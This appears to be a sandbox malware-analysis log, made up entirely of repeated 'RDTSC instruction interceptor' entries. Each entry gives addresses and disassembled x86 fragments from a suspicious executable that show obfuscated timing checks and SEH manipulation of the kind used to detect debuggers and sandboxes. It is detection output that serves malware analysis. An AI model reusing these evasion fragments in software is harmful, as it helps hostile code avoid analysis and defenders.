Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12E6AD7 second address: 12E6AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EC196 second address: 12EC19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EB944 second address: 12EB949 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EBAC3 second address: 12EBAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474D527175h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EBAE1 second address: 12EBAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EBAE7 second address: 12EBAFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EBD94 second address: 12EBD9A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EBD9A second address: 12EBDBC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F474D527166h 0x00000009 jmp 00007F474D52716Fh 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EBDBC second address: 12EBDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EBDC0 second address: 12EBDDB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F474D527166h 0x00000008 jnc 00007F474D527166h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jno 00007F474D527166h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EBDDB second address: 12EBDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EBF46 second address: 12EBF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EEF21 second address: 12EEF2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EF6CE second address: 12EF6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EFB61 second address: 12EFB67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EFC3D second address: 12EFC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EFD44 second address: 12EFD48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F0234 second address: 12F0238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F0238 second address: 12F0249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F474CE395F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F0249 second address: 12F0264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F0264 second address: 12F029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 mov dword ptr [ebp+12A22590h], eax 0x0000000f nop 0x00000010 push ecx 0x00000011 jmp 00007F474CE395FCh 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F474CE39608h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F03DE second address: 12F03E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F03E2 second address: 12F03E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F03E7 second address: 12F03FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jns 00007F474D52716Ch 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F08A9 second address: 12F0926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F474CE395FCh 0x00000010 jnl 00007F474CE395FCh 0x00000016 js 00007F474CE395F6h 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F474CE395F8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 pushad 0x00000039 movsx eax, si 0x0000003c sub ax, 6CA1h 0x00000041 popad 0x00000042 jng 00007F474CE395F8h 0x00000048 xchg eax, ebx 0x00000049 ja 00007F474CE39607h 0x0000004f push edx 0x00000050 jmp 00007F474CE395FFh 0x00000055 pop edx 0x00000056 push eax 0x00000057 push ecx 0x00000058 push eax 0x00000059 push edx 0x0000005a jne 00007F474CE395F6h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F29E0 second address: 12F29EA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F474D527166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F3D2F second address: 12F3D3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F474CE395F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F4ABE second address: 12F4AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F522C second address: 12F5257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F474CE39601h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F5CAA second address: 12F5CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F474D527166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F5EFB second address: 12F5EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F5CB4 second address: 12F5CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F67B8 second address: 12F67BD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F791B second address: 12F7921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F7F7E second address: 12F7F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F8F2A second address: 12F8F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F7F82 second address: 12F7F92 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F474CE395F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F9009 second address: 12F9013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F474D527166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F7F92 second address: 12F8042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F474CE395F6h 0x0000000a popad 0x0000000b jmp 00007F474CE395FFh 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F474CE395F8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov bx, FDF6h 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e pushad 0x0000003f sub dword ptr [ebp+12A2185Ch], eax 0x00000045 jmp 00007F474CE39605h 0x0000004a popad 0x0000004b mov eax, dword ptr [ebp+12A20DDDh] 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 call 00007F474CE395F8h 0x00000059 pop eax 0x0000005a mov dword ptr [esp+04h], eax 0x0000005e add dword ptr [esp+04h], 00000014h 0x00000066 inc eax 0x00000067 push eax 0x00000068 ret 0x00000069 pop eax 0x0000006a ret 0x0000006b jl 00007F474CE395FCh 0x00000071 mov edi, dword ptr [ebp+12A22978h] 0x00000077 mov edi, dword ptr [ebp+12BBAFC4h] 0x0000007d mov bx, 560Ah 0x00000081 push FFFFFFFFh 0x00000083 movzx ebx, si 0x00000086 nop 0x00000087 push eax 0x00000088 push edx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FAF2A second address: 12FAF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FB136 second address: 12FB1AF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F474CE395FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+12A224CCh], eax 0x00000013 push dword ptr fs:[00000000h] 0x0000001a cld 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov dword ptr [ebp+12BBA8EBh], ecx 0x00000028 mov eax, dword ptr [ebp+12A21725h] 0x0000002e or edi, 67C7752Bh 0x00000034 push FFFFFFFFh 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F474CE395F8h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 push eax 0x00000051 sbb bh, 00000063h 0x00000054 pop edi 0x00000055 jl 00007F474CE395FCh 0x0000005b nop 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FC1A9 second address: 12FC1AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FB1AF second address: 12FB1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FD0F9 second address: 12FD173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F474D527168h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+12BBAAB1h], edx 0x0000002c jng 00007F474D52716Bh 0x00000032 push ecx 0x00000033 and bl, 0000005Bh 0x00000036 pop ebx 0x00000037 push dword ptr fs:[00000000h] 0x0000003e je 00007F474D527167h 0x00000044 clc 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c mov bl, cl 0x0000004e mov eax, dword ptr [ebp+12A20DBDh] 0x00000054 mov bx, di 0x00000057 push FFFFFFFFh 0x00000059 mov ebx, dword ptr [ebp+12A22C34h] 0x0000005f nop 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FC1AF second address: 12FC1B9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F474CE395FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FB1B3 second address: 12FB1B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FD173 second address: 12FD177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FC1B9 second address: 12FC1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FD177 second address: 12FD185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE395FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12FC1C5 second address: 12FC1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1300F64 second address: 1300F85 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F474CE395F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F474CE39605h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13020B4 second address: 130212B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F474D52716Bh 0x00000008 jne 00007F474D527166h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 mov ebx, 117EB3E0h 0x00000019 push 00000000h 0x0000001b or di, 6D3Eh 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F474D527168h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e jmp 00007F474D527175h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F474D527174h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13010F3 second address: 13010F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13010F7 second address: 13010FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13010FD second address: 130110B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474CE395FAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13011FC second address: 1301206 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F474D527166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13022AF second address: 1302304 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F474CE395F6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f movzx edi, ax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, edi 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 movzx edi, dx 0x00000025 mov eax, dword ptr [ebp+12A20E05h] 0x0000002b mov edi, ebx 0x0000002d mov dword ptr [ebp+12A22631h], edx 0x00000033 push FFFFFFFFh 0x00000035 mov bx, ax 0x00000038 nop 0x00000039 jc 00007F474CE39602h 0x0000003f jns 00007F474CE395FCh 0x00000045 push eax 0x00000046 js 00007F474CE395FEh 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1304145 second address: 1304149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1309BB0 second address: 1309BBE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F474CE395F6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1309BBE second address: 1309C01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Ch 0x00000007 jo 00007F474D527166h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F474D52716Fh 0x00000018 jc 00007F474D52717Ah 0x0000001e jmp 00007F474D527172h 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12F3D2B second address: 12F3D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13112CA second address: 13112CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13112CE second address: 13112E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F474CE395FEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13112E2 second address: 13112E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1310B8A second address: 1310BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F474CE3960Eh 0x0000000f jmp 00007F474CE39602h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1310BBC second address: 1310BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007F474D527166h 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1310E3C second address: 1310E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1310E42 second address: 1310E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1314AAB second address: 1314B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnl 00007F474CE3960Ch 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jo 00007F474CE395FAh 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F474CE395FCh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F474CE39609h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 131B947 second address: 131B95E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007F474D527168h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 131AFA6 second address: 131AFBA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F474CE395F8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F474CE395F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 131AFBA second address: 131AFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 131AFBE second address: 131AFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 131B4F4 second address: 131B4FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 131B7B6 second address: 131B7EC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F474CE395F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F474CE3960Dh 0x00000012 pop edx 0x00000013 jl 00007F474CE39604h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1321F64 second address: 1321F81 instructions: 0x00000000 rdtsc 0x00000002 js 00007F474D527175h 0x00000008 jmp 00007F474D52716Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1321F81 second address: 1321F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1320C2C second address: 1320C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1320C30 second address: 1320C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474CE39609h 0x00000009 jmp 00007F474CE39608h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1320DE1 second address: 1320DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474D52716Ch 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
